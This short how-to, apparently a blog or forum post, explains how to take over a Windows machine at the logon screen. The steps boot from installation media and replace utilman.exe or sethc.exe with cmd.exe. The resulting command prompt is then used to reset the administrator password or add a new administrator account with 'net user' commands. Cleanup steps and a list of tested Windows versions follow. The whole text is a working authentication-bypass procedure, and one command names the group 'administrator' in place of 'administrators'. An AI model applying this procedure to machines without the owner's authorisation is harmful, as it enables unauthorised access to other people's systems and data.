To gain a local admin password is rather simple on any machine that is not bitlocked or some how protected offline.
Setup:
Have/Make a bootable windows 10 USB stick…
#1 Boot windows media Press Shift+F10 to gain Commandprompt
#2 Change dir to local windows drive c:\windows\system32
#3 copy utilman.exe utilman.old
#4 copy cmd.exe utilman.exe
# ALT is to use sethc.exe… activates with Shift 5 times…
#5 reboot computer and boot into windows
#6 Press Windows + U and now a command prompt will appear outside windows logon. (Or shift 5 times…)
#7 Change current admin password with
Net user administrator newpassword
net user administrator /active:yes
If needed make a new account with
net user NewAdmin /add
net localgroup administrator NewAdmin /add
#8 Reboot and login with the new/changed account
Cleanup:
This probably needs a bit of extra high rights – installer etc..
Reset it the same way you setit up above will always work.
# Start a commandprompt as admin.
#Change dir to local windows drive c:\windows\system32
delete utilman.exe
Copy utilman.old utilman.exe
Press Windows + U to se controll comming upp ok
Or Shift 5 times if you are using Sethc.exe
Tested and works on:
Windows Server 2016 Technical Preview 5
Windows 7
Windows 10 1909
Windows Server 2012 R2